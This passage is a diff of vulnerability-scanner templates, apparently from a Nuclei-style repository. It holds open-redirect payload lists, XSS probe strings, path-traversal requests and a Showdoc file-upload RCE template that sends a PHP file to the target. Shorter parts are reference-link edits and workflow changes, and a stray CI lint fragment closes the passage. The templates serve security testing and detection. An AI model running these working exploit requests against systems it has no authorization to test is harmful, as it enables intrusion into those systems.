      - '{{BaseURL}}\example.com'
      - '{{BaseURL}}//example.com/'
      - '{{BaseURL}}\/\/example.com/'
      - '{{BaseURL}}%00\/\/example.com/'
      - '{{BaseURL}}/%00/example.com/'
      - '{{BaseURL}}/%09/example.com/'
      - '{{BaseURL}}/%0a/example.com/'
@ -33,14 +30,9 @@ requests:
      - '{{BaseURL}}/%5cexample.com/%2f%2e%2e'
      - '{{BaseURL}}@example.com'
      - '{{BaseURL}}/{{BaseURL}}example.com'
      - '{{BaseURL}}\{{BaseURL}}example.com'
      - '{{BaseURL}}//{{BaseURL}}example.com/'
      - '{{BaseURL}}\/\/{{BaseURL}}example.com/'
      - '{{BaseURL}}%00\/\/{{BaseURL}}example.com/'
      - '{{BaseURL}}////{{BaseURL}}example.com/%2f%2e%2e'
      - '{{BaseURL}}/%5c{{BaseURL}}example.com/%2f%2e%2e'
      - '{{BaseURL}}/〱{{BaseURL}}example.com/%2f%2e%2e'
      - '{{BaseURL}}@{{BaseURL}}example.com'
      - '{{BaseURL}}/?page=example.com&_url=example.com&callback=example.com&checkout_url=example.com&content=example.com&continue=example.com&continueTo=example.com&counturl=example.com&data=example.com&dest=example.com&dest_url=example.com&diexample.com&document=example.com&domain=example.com&done=example.com&download=example.com&feed=example.com&file=example.com&host=example.com&html=example.com&http=example.com&https=example.com&image=example.com&image_src=example.com&image_url=example.com&imageurl=example.com&include=example.com&langTo=example.com&media=example.com&navigation=example.com&next=example.com&open=example.com&out=example.com&page=example.com&page_url=example.com&pageurl=example.com&path=example.com&picture=example.com&port=example.com&proxy=example.com&redir=example.com&redirect=example.com&redirectUri=example.com&redirectUrl=example.com&reference=example.com&referrer=example.com&req=example.com&request=example.com&retUrl=example.com&return=example.com&returnTo=example.com&return_path=example.com&return_to=example.com&rurl=example.com&show=example.com&site=example.com&source=example.com&src=example.com&target=example.com&to=example.com&uri=example.com&url=example.com&val=example.com&validate=example.com&view=example.com&window=example.com&redirect_to=example.com&ret=example.com&r2=example.com&img=example.com&u=example.com&r=example.com&URL=example.com&AuthState=example.com'
    matchers:
      - type: regex
--- a/vulnerabilities/generic/top-xss-params.yaml
+++ b/vulnerabilities/generic/top-xss-params.yaml
@ -19,21 +19,21 @@ requests:
    matchers:
      - type: word
        words:
-          - "\"<svg/onload=confirm('q')>"
+          - "'>\"<svg/onload=confirm('q')>"
-          - "\"<svg/onload=confirm('s')>"
+          - "'>\"<svg/onload=confirm('s')>"
-          - "\"<svg/onload=confirm('search')>"
+          - "'>\"<svg/onload=confirm('search')>"
-          - "\"<svg/onload=confirm('id')>"
+          - "'>\"<svg/onload=confirm('id')>"
-          - "\"<svg/onload=confirm('action')>"
+          - "'>\"<svg/onload=confirm('action')>"
-          - "\"<svg/onload=confirm('keyword')>"
+          - "'>\"<svg/onload=confirm('keyword')>"
-          - "\"<svg/onload=confirm('query')>"
+          - "'>\"<svg/onload=confirm('query')>"
-          - "\"<svg/onload=confirm('page')>"
+          - "'>\"<svg/onload=confirm('page')>"
-          - "\"<svg/onload=confirm('keywords')>"
+          - "'>\"<svg/onload=confirm('keywords')>"
-          - "\"<svg/onload=confirm('url')>"
+          - "'>\"<svg/onload=confirm('url')>"
-          - "\"<svg/onload=confirm('view')>"
+          - "'>\"<svg/onload=confirm('view')>"
-          - "\"<svg/onload=confirm('cat')>"
+          - "'>\"<svg/onload=confirm('cat')>"
-          - "\"<svg/onload=confirm('name')>"
+          - "'>\"<svg/onload=confirm('name')>"
-          - "\"<svg/onload=confirm('key')>"
+          - "'>\"<svg/onload=confirm('key')>"
-          - "\"<svg/onload=confirm('p')>"
+          - "'>\"<svg/onload=confirm('p')>"
        part: body
        condition: or
@ -42,6 +42,14 @@ requests:
          - "text/html"
        part: header
      - type: word
        words:
          - "<title>Access Denied</title>"
          - "You don't have permission to access"
        part: body
        condition: and
        negative: true
      - type: status
        status:
          - 200
--- a/vulnerabilities/oracle/oracle-ebs-bispgraph-file-access.yaml
+++ b/vulnerabilities/oracle/oracle-ebs-bispgraph-file-access.yaml
@ -5,6 +5,10 @@ info:
  author: emenalf & tirtha_mandal
  severity: critical
  tags: moodle,lfi
  reference: |
    - https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-4.pdf
    - https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite.pdf
    - http://www.davidlitchfield.com/AssessingOraclee-BusinessSuite11i.pdf
 requests:
  - method: GET
--- a/vulnerabilities/other/myucms-lfr.yaml
+++ b/vulnerabilities/other/myucms-lfr.yaml
@ -4,6 +4,7 @@ info:
  author: princechaddha
  severity: high
  tags: myucms,lfi
  reference: https://blog.csdn.net/yalecaltech/article/details/104908257
 requests:
  - method: GET
--- a/vulnerabilities/other/nuuo-nvrmini2-rce.yaml
+++ b/vulnerabilities/other/nuuo-nvrmini2-rce.yaml
@ -5,11 +5,10 @@ info:
  author: berkdusunur
  severity: critical
  tags: rce
-
+  reference: |
-  # Reference:-
+    - https://www.exploit-db.com/exploits/45070
-  # https://www.exploit-db.com/exploits/45070
+    - https://github.com/berkdsnr/NUUO-NVRMINI-RCE
-  # https://github.com/berkdsnr/NUUO-NVRMINI-RCE
+    - https://packetstormsecurity.com/files/151573/NUUO-NVRmini-upgrade_handle.php-Remote-Command-Execution.html
  # https://packetstormsecurity.com/files/151573/NUUO-NVRmini-upgrade_handle.php-Remote-Command-Execution.html
 requests:
  - method: GET
@ -18,8 +17,8 @@ requests:
    matchers-condition: and
    matchers:
-      - type: regex
+      - type: word
-        regex:
+        words:
          - "/upload_tmp_dir/"
        part: body
--- a/vulnerabilities/other/oa-v9-uploads-file.yaml
+++ b/vulnerabilities/other/oa-v9-uploads-file.yaml
@ -1,9 +1,10 @@
 id: oa-v9-uploads-file
 info:
-  name: OA V9 Uploads File
+  name: OA V9 RCE via File Upload
  author: pikpikcu
  severity: high
  description: A vulnerability in OA V9 uploadOperation.jsp endpoint allows remote attackers to upload arbitrary files to the server. These files can be subsequently called and are executed by the remote software.
  reference: https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g
  tags: rce,jsp
--- a/vulnerabilities/other/powercreator-cms-rce.yaml
+++ b/vulnerabilities/other/powercreator-cms-rce.yaml
@ -4,7 +4,7 @@ info:
  name: PowerCreator CMS RCE
  author: pikpikcu
  severity: critical
-  reference: http://www.mstir.cn/index.php/2020/11/18/powercreatorcms-rce/
+  reference: https://wiki.96.mk/Web%E5%AE%89%E5%85%A8/PowerCreatorCms/PowerCreatorCms%E4%BB%BB%E6%84%8F%E4%B8%8A%E4%BC%A0/
  tags: rce,powercreator
 requests:
--- a/vulnerabilities/other/rce-via-java-deserialization.yaml
+++ b/vulnerabilities/other/rce-via-java-deserialization.yaml
@ -1,23 +0,0 @@
 id: rce-via-java-deserialization
 info:
  name: Java Deserialization [RCE]
  author: uhnysh
  severity: critical
  tags: java,rce
  reference: https://www.synopsys.com/blogs/software-security/mitigate-java-deserialization-vulnerability-jboss/
  # This can only be used to detect the vuln, please make sure to run ysoserial over the URLs to verify.
 requests:
  - method: GET
    path:
      - "{{BaseURL}}/josso/%5C../invoker/EJBInvokerServlet/"
      - "{{BaseURL}}/josso/%5C../invoker/JMXInvokerServlet/"
      - "{{BaseURL}}/invoker/JMXInvokerServlet/"
      - "{{BaseURL}}/invoker/EJBInvokerServlet/"
    matchers:
      - type: word
        words:
          - "org.jboss.invocation.MarshalledValue"
          - "java.lang"
        condition: and
--- a/vulnerabilities/other/resin-cnnvd-200705-315.yaml
+++ b/vulnerabilities/other/resin-cnnvd-200705-315.yaml
@ -0,0 +1,25 @@
 id: resin-cnnvd-200705-315
 info:
  name: Caucho Resin Information Disclosure
  author: princechaddha
  severity: high
  reference: |
    - http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200705-315
  tags: resin,caucho,lfr
 requests:
  - method: GET
    path:
      - "{{BaseURL}}/%20../web-inf/"
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "/ ../web-inf/"
          - "Directory of /"
        condition: and
        part: body
--- a/vulnerabilities/other/showdoc-file-upload-rce.yaml
+++ b/vulnerabilities/other/showdoc-file-upload-rce.yaml
@ -0,0 +1,47 @@
 id: showdoc-file-upload-rce
 info:
  name: Showdoc < 2.8.6 File Upload RCE
  author: pikpikcu
  severity: critical
  reference: https://github.com/star7th/showdoc/pull/1059
  tags: rce,fileupload,showdoc
 requests:
  - raw:
      - |
        POST /index.php?s=/home/page/uploadImg HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
        Content-Length: 239
        Content-Type: multipart/form-data; boundary=--------------------------835846770881083140190633
        Accept-Encoding: gzip
        ----------------------------835846770881083140190633
        Content-Disposition: form-data; name="editormd-image-file"; filename="test.<>php"
        Content-Type: text/plain
        <?php phpinfo();?>
        ----------------------------835846770881083140190633--
      - |
        GET /Public/Uploads{{url_decode("§path§")}} HTTP/1.1
        Host: {{Hostname}}
        Origin: {{BaseURL}}
    extractors:
      - type: regex
        name: path
        group: 1
        internal: true
        part: body
        regex:
          - '/Uploads\\(.*?)"\,"success"'
    req-condition: true
    matchers:
      - type: dsl
        dsl:
          - 'contains(body_2, "PHP Extension")'
          - 'contains(body_2, "PHP Version")'
          - 'status_code_2 == 200'
        condition: and
--- a/vulnerabilities/springboot/springboot-actuators-jolokia-xxe.yaml
+++ b/vulnerabilities/springboot/springboot-actuators-jolokia-xxe.yaml
@ -4,7 +4,10 @@ info:
  name: Spring Boot Actuators (Jolokia) XXE
  author: dwisiswant0
  severity: high
-  description: todo
+  description: A vulnerability in Spring Boot Actuators's 'jolokia' endpoint allows remote attackers to preform an XML External Entities attack, include content stored on a remote server as if it was its own - this has the potential to allow the execution of arbitrary code and/or disclosure of sensitive information from the target machine.
  reference: |
    - https://www.veracode.com/blog/research/exploiting-spring-boot-actuators
    - https://github.com/mpgn/Spring-Boot-Actuator-Exploit
  tags: springboot,jolokia,xxe
 requests:
--- a/vulnerabilities/wordpress/wordpress-wordfence-xss.yaml
+++ b/vulnerabilities/wordpress/wordpress-wordfence-xss.yaml
@ -9,14 +9,19 @@ info:
 requests:
  - method: GET
    path:
-      - "{{BaseURL}}/wp-content/plugins/wordfence/lib/diffResult.php?file=%22%3E%3Csvg%2Fonload%3Dalert(1337)%3E"
+      - "{{BaseURL}}/wp-content/plugins/wordfence/lib/diffResult.php?file=%27%3E%22%3Csvg%2Fonload=confirm%28%27test%27%29%3E"
    matchers-condition: and
    matchers:
      - type: word
        words:
-          - "<svg/onload=alert(1337)>"
+          - "'>\"<svg/onload=confirm('test')>"
        part: body
      - type: word
        words:
          - "text/html"
        part: header
      - type: status
        status:
          - 200
--- a/workflows/cisco-asa-workflow.yaml
+++ b/workflows/cisco-asa-workflow.yaml
@ -17,4 +17,3 @@ workflows:
      - template: cves/2020/CVE-2020-3187.yaml
      - template: cves/2020/CVE-2020-3452.yaml
      - template: cves/2018/CVE-2018-0296.yaml
      - template: cves/2018/CVE-2018-0101.yaml
--- a/workflows/ruijie-workflow.yaml
+++ b/workflows/ruijie-workflow.yaml
@ -11,3 +11,4 @@ workflows:
  - template: vulnerabilities/other/ruijie-networks-rce.yaml
  - template: exposures/configs/ruijie-information-disclosure.yaml
  - template: exposures/configs/ruijie-smartweb-disclosure.yaml
  - template: exposures/configs/ruijie-phpinfo.yaml
--- a/workflows/springboot-workflow.yaml
+++ b/workflows/springboot-workflow.yaml
@ -11,11 +11,12 @@ info:
 workflows:
-  - template: technologies/detect-springboot-actuator.yaml
+  - template: technologies/springboot-actuator.yaml
    subtemplates:
      - template: misconfiguration/springboot/springboot-configprops.yaml
      - template: misconfiguration/springboot/springboot-env.yaml
      - template: misconfiguration/springboot/springboot-heapdump.yaml
      - template: misconfiguration/springboot/springboot-httptrace.yaml
      - template: misconfiguration/springboot/springboot-loggers.yaml
      - template: misconfiguration/springboot/springboot-mappings.yaml
      - template: misconfiguration/springboot/springboot-trace.yaml
`@ -1,4 +1,4 @@`
	`name: syntax-checking`	`name: ❄️ YAML Lint`

	`on: [push, pull_request]`	`on: [push, pull_request]`